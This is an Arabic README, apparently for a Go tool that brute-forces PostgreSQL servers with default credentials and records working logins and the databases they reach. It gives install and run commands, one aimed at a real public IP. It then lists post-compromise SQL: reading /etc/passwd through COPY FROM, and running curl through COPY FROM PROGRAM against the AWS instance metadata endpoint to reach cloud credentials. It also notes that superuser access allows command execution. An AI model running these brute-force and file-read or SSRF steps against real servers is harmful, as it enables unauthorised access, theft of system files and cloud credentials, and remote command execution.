
تأخذ هذه الأداة قائمةً من بيانات الاعتماد الافتراضية وتختبرها ضد خادم PostgreSQL، ثم تسجّل أيًّا منها يعمل وقواعد البيانات التي يمنح الوصول إليها.
يقوم هذا السكربت المكتوب بلغة Go بقراءة قائمة بأسماء المستخدمين وكلمات المرور من ملف باسم creds.txt ويختبرها ضد قاعدة بيانات PostgreSQL.
يقبل السكربت عنوان IP لخادم PostgreSQL كوسيط سطر أوامر أو ملف نصي يحتوي على عناوين IP.
إذا تم منح الوصول، يكتب السكربت هذا المخرج إلى ملف باسم pg-output.txt.
إذا كان المستخدم postgres متاحًا، فهو عادةً مستخدم خارق (super user) يمكنه السماح بتنفيذ أوامر (RCE) أو قراءة ملفات محلية (LFI) أو طلبات من الخادم (SSRF).
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest
go run postgres-brute.go 1.1.1.1
postgres
قراءة ملف /etc/passwd/
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;
SSRF - الوصول إلى بيانات AWS الوصفية
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;